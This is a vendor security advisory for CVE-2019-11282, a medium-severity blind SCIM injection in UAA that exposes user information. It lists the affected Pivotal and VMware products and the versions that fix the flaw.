CVE-2019-11282: UAA is vulnerable to a Blind SCIM injection leading to information disclosure
Severity
Medium
Vendor
Pivotal
Description
VMware Tanzu Application Service for VMs, versions prior to 2.8.0, Operations Manager, versions prior to 2.8.0, and Pivotal Container Service, versions prior to 1.7.0, contain a vulnerable version of UAA, which contains an endpoint that is vulnerable to SCIM injection. A remote authenticated malicious user with scim.invite scope can craft a request with malicious content which can leak information about users of the UAA.
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
-
Operations Manager
- All versions prior to 2.8.0
-
Pivotal Container Service (PKS)
- All versions prior to 1.7.0
-
VMware Tanzu Application Service for VMs
- All versions prior to 2.8.0
Mitigation
Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:
-
Operations Manager
- 2.8.0
-
Pivotal Container Service (PKS)
- 1.7.0
-
VMware Tanzu Application Service for VMs
- 2.8.0
Credit
Amit Laish - GE Digital Cyber Security Team
References
- https://www.cloudfoundry.org/blog/cve-2019-11282/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11282
History
2020-04-06: Initial vulnerability report published.